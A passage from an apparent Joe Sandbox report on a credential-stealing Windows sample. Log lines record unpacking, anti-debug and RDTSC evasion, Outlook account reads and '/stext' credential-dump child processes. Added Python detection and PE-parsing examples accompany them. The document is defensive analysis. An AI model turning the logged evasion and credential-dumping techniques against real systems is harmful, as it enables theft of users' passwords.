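            alerts.append({"rule": "multiple_credential_dumpers", "pid": ppid, "count": n})
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```

The /stext rule alone will also fire on a legitimately installed NirSoft tool; the self_spawn flag (child image equals parent image) and the aggregate rule are what separate this report's pattern, three dumpers hollowed into copies of a single loader, from an administrator running one tool by hand.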
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile written: C:\Program Files (x86)\Common Files\kvindagtigt.iniJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile opened: C:\Users\user\Desktop\orders_PI 008-01.cfgJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: orders_PI 008-01.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Unpacked PE file: 5.2.orders_PI 008-01.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Unpacked PE file: 6.2.orders_PI 008-01.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Unpacked PE file: 7.2.orders_PI 008-01.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: Yara match | File source: 00000000.00000002.1643832066.00000000046DE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 0_2_6FF41B5F LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW | 0_2_6FF41B5F
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 0_2_0462701E push esp; retf | 0_2_0462701F
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 0_2_046242F0 push eax; ret | 0_2_046242F1
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 0_2_046227AD push eax; retf | 0_2_046227AF
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 0_2_046235B7 push 58C714BAh; iretd | 0_2_046235C4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 0_2_04623D89 push eax; retf | 0_2_04623D97
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344B2806 push ecx; ret | 3_2_344B2819
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344BB4B5 push esi; ret | 3_2_344BB4BE
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344C1219 push esp; iretd | 3_2_344C121A
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_01AA27AD push eax; retf | 3_2_01AA27AF
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_01AA35B7 push 58C714BAh; iretd | 3_2_01AA35C4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_01AA3D89 push eax; retf | 3_2_01AA3D97
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_01AA42F0 push eax; ret | 3_2_01AA42F1
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_01AA701E push esp; retf | 3_2_01AA701F
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0044693D push ecx; ret | 5_2_0044694D
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0044DB70 push eax; ret | 5_2_0044DB84
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0044DB70 push eax; ret | 5_2_0044DBAC
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00451D54 push eax; ret | 5_2_00451D61
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_0044B090 push eax; ret | 6_2_0044B0A4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_0044B090 push eax; ret | 6_2_0044B0CC
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_00451D34 push eax; ret | 6_2_00451D41
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_00444E71 push ecx; ret | 6_2_00444E81
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_00414060 push eax; ret | 7_2_00414074
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_00414060 push eax; ret | 7_2_0041409C
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_00414039 push ecx; ret | 7_2_00414049
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_004164EB push 0000006Ah; retf | 7_2_004165C4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_00416553 push 0000006Ah; retf | 7_2_004165C4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_00416555 push 0000006Ah; retf | 7_2_004165C4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | File created: C:\Users\user\AppData\Local\Temp\nslA6E2.tmp\System.dll
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 6_2_004047CB
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process information set: NOOPENFILEERRORBOX
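              The "Unpacked PE file" rows at the top of this section compare the section table of the in-memory image (.text, .rdata, .data, .ndata, .rsrc) with the on-disk MPRESS-packed file (.MPRESS1, .MPRESS2, .rsrc): the section names and rights change once the packer stub has run. As an added example, not part of the report or of Joe Sandbox, the following Python locates a PE section table, renders each section's memory-protection flags, and flags the two indicators those rows embody: packer-specific section names and sections that are both writable and executable. The packer name list, the E/R/W letters (the report's own notation is terser) and the two constructed section tables are assumptions modelled on the rows above, not data taken from the sample.

```python
import struct

# IMAGE_SECTION_HEADER is 40 bytes: 8-byte name, six DWORDs, two WORDs, one DWORD (Characteristics)
SECTION_HEADER = struct.Struct("<8s6I2HI")

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
E, R, W = IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

# Section names typical of packers. Assumption: a short illustrative list; MPRESS is the
# packer the report's rows show, the others are other packers' default section names.
PACKER_SECTION_NAMES = {".MPRESS1", ".MPRESS2", "UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".petite"}


def section_table(pe_bytes):
    """Locate the section table of a real PE image: e_lfanew -> PE signature -> COFF header -> optional header."""
    e_lfanew = struct.unpack_from("<I", pe_bytes, 0x3C)[0]
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    number_of_sections = struct.unpack_from("<H", pe_bytes, e_lfanew + 6)[0]
    size_of_optional_header = struct.unpack_from("<H", pe_bytes, e_lfanew + 20)[0]
    start = e_lfanew + 24 + size_of_optional_header
    return pe_bytes[start:start + number_of_sections * SECTION_HEADER.size], number_of_sections


def parse_sections(table, count):
    """Yield (name, characteristics) for `count` consecutive headers in `table`."""
    for i in range(count):
        fields = SECTION_HEADER.unpack_from(table, i * SECTION_HEADER.size)
        yield fields[0].rstrip(b"\0").decode("latin-1"), fields[9]


def rights(characteristics):
    """Letters for the memory-protection flags in E, R, W order."""
    flags = ((E, "E"), (R, "R"), (W, "W"))
    return "".join(letter for flag, letter in flags if characteristics & flag)


def summarize(table, count):
    """Render a table as 'name:rights;' pairs, the shape of the report's 'Unpacked PE file' rows."""
    return "".join(f"{name}:{rights(c)};" for name, c in parse_sections(table, count))


def packer_indicators(table, count):
    """Static hints that the image is packed: packer section names, and sections both writable and executable."""
    findings = []
    for name, c in parse_sections(table, count):
        if name in PACKER_SECTION_NAMES:
            findings.append(f"packer section name {name}")
        if c & E and c & W:
            findings.append(f"writable and executable section {name}")
    return findings


def section_rights_changed(on_disk, disk_count, in_memory, mem_count):
    """The essence of the 'changes PE section rights' signature: the dumped in-memory image has a
    different section layout or different rights from the file on disk."""
    return summarize(on_disk, disk_count) != summarize(in_memory, mem_count)


def pack_header(name, characteristics, vsize=0x1000, vaddr=0x1000, rawsize=0x1000, rawptr=0x400):
    """Constructed test data: one section header packed as the PE section table stores it."""
    return SECTION_HEADER.pack(name.encode("latin-1").ljust(8, b"\0"), vsize, vaddr, rawsize, rawptr,
                               0, 0, 0, 0, characteristics)


def build_minimal_pe(table, count):
    """Constructed test data: DOS header with e_lfanew, PE signature, a COFF header declaring no
    optional header, then the section table. Enough for section_table() to find the table."""
    dos_header = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff_header = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, count, 0, 0, 0, 0, 0x0102)
    return dos_header + coff_header + table


# Constructed tables modelled on the report's row: MPRESS layout on disk, normal layout after unpacking.
PACKED = b"".join([pack_header(".MPRESS1", E | R | W), pack_header(".MPRESS2", E | R), pack_header(".rsrc", R | W)])
UNPACKED = b"".join([pack_header(".text", E | R), pack_header(".rdata", R), pack_header(".data", R | W),
                     pack_header(".ndata", R | W), pack_header(".rsrc", R)])

if __name__ == "__main__":
    table, n = section_table(build_minimal_pe(PACKED, 3))
    print(summarize(table, n), packer_indicators(table, n))
    print(summarize(UNPACKED, 5), packer_indicators(UNPACKED, 5))
    print("rights changed:", section_rights_changed(PACKED, 3, UNPACKED, 5))
```

              On a real file, pass the bytes of the executable to section_table() and feed the result to summarize() and packer_indicators(); a sandbox produces the "vs" half of the row by dumping the process image after the stub has run and summarizing that instead. A packer name or a writable-and-executable section is a hint, not proof: legitimate software with self-modifying stubs and some compilers' runtime sections trigger the same checks, so treat the finding as a reason to unpack and look, as the report does, rather than as a verdict.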

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | API/Special instruction interceptor: Address: 4D4B883
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | API/Special instruction interceptor: Address: 21CB883
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | RDTSC instruction interceptor: First address: 4D24840 second address: 4D24840 instructions: 0x00000000 rdtsc; 0x00000002 cmp ebx, ecx; 0x00000004 jc 00007F488D312D8Ah; 0x00000006 inc ebp; 0x00000007 inc ebx; 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | RDTSC instruction interceptor: First address: 21A4840 second address: 21A4840 instructions: 0x00000000 rdtsc; 0x00000002 cmp ebx, ecx; 0x00000004 jc 00007F488D07D97Ah; 0x00000006 inc ebp; 0x00000007 inc ebx; 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle | 5_2_0040DD85
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Window / User API: threadDelayed 9292
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Window / User API: foregroundWindowGot 1769
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslA6E2.tmp\System.dll
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | API coverage: 9.9 %
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe TID: 7360 | Thread sleep count: 260 > 30
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe TID: 7360 | Thread sleep time: -130000s >= -30000s
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe TID: 7356 | Thread sleep count: 178 > 30
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe TID: 7356 | Thread sleep time: -534000s >= -30000s
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe TID: 7356 | Thread sleep count: 9292 > 30
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe TID: 7356 | Thread sleep time: -27876000s >= -30000s
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 0_2_0040674C FindFirstFileW,FindClose | 0_2_0040674C
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 0_2_00405B00
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,LdrInitializeThunk,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose | 3_2_344B10F1
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344B6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,LdrInitializeThunk | 3_2_344B6580
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0040AE51 FindFirstFileW,FindNextFileW | 5_2_0040AE51
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen | 6_2_00407EF8
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen | 7_2_00407898
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_00418981 memset,GetSystemInfo | 5_2_00418981
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`EY
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: bhv2901.tmp.5.dr | Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | API call chain: ExitProcess graph end node | graph_0-2680
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | API call chain: ExitProcess graph end node | graph_0-2893
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | API call chain: ExitProcess graph end node | graph_6-34110
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 0_2_0040324C LdrInitializeThunk,GetTickCount,GetTickCount,GetTickCount,MulDiv,wsprintfW | 0_2_0040324C
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344B60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_344B60E2
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle | 5_2_0040DD85
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 0_2_6FF41B5F LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW | 0_2_6FF41B5F
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344B4AB4 mov eax, dword ptr fs:[00000030h] | 3_2_344B4AB4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344B724E GetProcessHeap | 3_2_344B724E
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process token adjusted: Debug
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344B60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_344B60E2
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344B2639 LdrInitializeThunk,IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,LdrInitializeThunk | 3_2_344B2639
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344B2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 3_2_344B2B1C

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: NULL target: C:\Users\user\Desktop\orders_PI 008-01.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: NULL target: C:\Users\user\Desktop\orders_PI 008-01.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Section loaded: NULL target: C:\Users\user\Desktop\orders_PI 008-01.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe"
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\zwewot"
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\jqrhomwbo"
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Process created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\msxapegdbomic"
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\b
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\*U
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\Z
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\a6
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr|
